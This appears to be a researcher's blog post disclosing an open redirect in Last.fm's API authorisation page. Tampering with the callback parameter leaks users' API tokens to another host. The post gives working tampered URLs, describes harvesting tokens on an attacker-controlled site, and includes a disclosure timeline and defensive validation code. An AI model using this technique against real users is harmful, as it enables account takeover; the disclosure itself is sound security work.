Last.fm - Open redirect leading to API token leak
tl;dr - open redirects still exist in 2025 and can have more impact than just phishing - this one gives API access to the account
what's Last.fm?
Last.fm is a music tracking website primarily used for tracking listening statistics. it's commonly integrated with Discord bots.
what's the vulnerability?
i was using OpenScrobbler to add listens for some songs i had listened to which hadn't been picked up by last.fm. when logging in, i was redirected to this page:

(quick note: OpenScrobbler is not vulnerable or at fault - i am just using their site as an example)
the URL contains a callback parameter back to the OpenScrobbler site. when i see something like this, i like to give it a quick check just for fun. i replaced openscrobbler.com with example.com, like this:
https://www.last.fm/api/auth?api_key=0aa2e9944f3e38f7a64358dde668ff63&cb=https://openscrobbler.com/
to:
https://www.last.fm/api/auth?api_key=0aa2e9944f3e38f7a64358dde668ff63&cb=https://example.com/
the site still looked the same:

when i clicked "YES, ALLOW ACCESS", i was redirected to the following URL (parameter has been partially redacted):
https://example.com/?token=LgmrLbU5Li7RyruFHXXXXXXXXXXXXXXX
in another completely separate browser instance, i appended the token to the intended site:
https://openscrobbler.com/?token=LgmrLbU5Li7RyruFHXXXXXXXXXXXXXXX

i was now logged in to the OpenScrobbler site and could perform actions on the user's account.
what just happened?
in the vulnerable Last.fm page:
https://www.last.fm/api/auth?api_key=0aa2e9944f3e38f7a64358dde668ff63&cb=https://openscrobbler.com/
the api_key parameter is the public Last.fm API key associated with OpenScrobbler.
when redirecting to the callback URL, which we changed to example.com, the token parameter (LgmrLbU5Li7RyruFHXXXXXXXXXXXXXXX) was appended to the URL. this token is an API key for the authenticated Last.fm account.
if we use a site we control instead of example.com and a user clicks "YES, ALLOW ACCESS" on the tampered URL, we receive a request containing the token (LgmrLbU5Li7RyruFHXXXXXXXXXXXXXXX) and can use it to gain API access to the user's account. we could then redirect the user to a valid login page so they still end up authenticated to OpenScrobbler, avoiding suspicion.
what can you do with this?
according to the Last.fm API, after receiving an authentication token we have 60 minutes to use it to retrieve a session, and the retrieved session is then valid forever:

some things we can do with the compromised user API token include:
- Add listens to tracks
- Favourite/unfavourite tracks
- Add or remove tags from tracks, albums, and artists
timeline
2025
- June 29: Emailed asking for a disclosure process or a form/contact email for sending details to
- July 3: Followed up on this
- July 7: Last.fm responds, "Thank you for contacting Last.fm. Please contact our Support Team at [Salesforce Contact Support page]."
- July 7: Created a case asking where to send details to, as the form did not have any option for security disclosures (only account/billing issues and reporting abuse)
- July 11: Last.fm responds, "Thank you for your email. Please send the details to [email protected]."
- July 11: I send an email containing the vulnerability details, including detailed reproduction steps, to [email protected], and mention that I plan to disclose these after 90 days have passed
- July 22: I follow up asking if there are any updates
- August 8: I follow up asking if there are any updates
- September 3: I follow up asking if there are any updates
2026
- June 2: Post published
(no response or communication after the disclosure)
bonus round!
i also disclosed that while https://www.last.fm/login?next=https://example.com is properly handled and won't redirect to example.com if you haven't yet logged in, it immediately redirects you if you are already authenticated. while writing this i noticed the same applies to https://www.last.fm/join?next=https://example.com
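as an added example (my code, not Last.fm's or OpenScrobbler's), here is the server-side validation that would close both the cb issue from the "what just happened?" section and the next= issue in this bonus round: the callback is checked against the URL registered for the api_key, and next= is limited to a local path. the registry mapping below is an assumption about how the server stores registered callbacks; the api_key value is the public one from the URLs above.

```python
from urllib.parse import urlsplit

# Constructed registry for illustration: each API key maps to the single
# callback URL its owner registered. How Last.fm really stores this is assumed.
REGISTERED_CALLBACKS = {
    "0aa2e9944f3e38f7a64358dde668ff63": "https://openscrobbler.com/",
}


def _https_origin(url):
    """Return (host, port, path) for an https URL without userinfo, else None."""
    try:
        p = urlsplit(url)
        port = p.port or 443            # raises ValueError on a malformed port
    except ValueError:
        return None
    if p.scheme != "https" or not p.hostname or p.username is not None:
        return None
    return p.hostname.lower(), port, (p.path or "/")


def callback_is_allowed(api_key, cb):
    """Accept cb only if it stays on the callback registered for api_key.

    Host and port must match exactly, so openscrobbler.com.evil.example and
    openscrobbler.com@evil.example are rejected, and the path must be the
    registered path or a sub-path of it, so the token is never sent elsewhere.
    """
    registered = _https_origin(REGISTERED_CALLBACKS.get(api_key, ""))
    supplied = _https_origin(cb)
    if registered is None or supplied is None:
        return False
    if (supplied[0], supplied[1]) != (registered[0], registered[1]):
        return False
    reg_path = registered[2]
    return supplied[2] == reg_path or supplied[2].startswith(reg_path.rstrip("/") + "/")


def safe_next(next_value, default="/"):
    """For login?next= / join?next=: allow only a local path, never a full URL."""
    if (not next_value
            or any(ord(ch) < 0x21 for ch in next_value)   # control chars / whitespace
            or not next_value.startswith("/")
            or next_value.startswith(("//", "/\\"))):     # browsers treat both as scheme-relative
        return default
    p = urlsplit(next_value)
    if p.scheme or p.netloc:
        return default
    return next_value
```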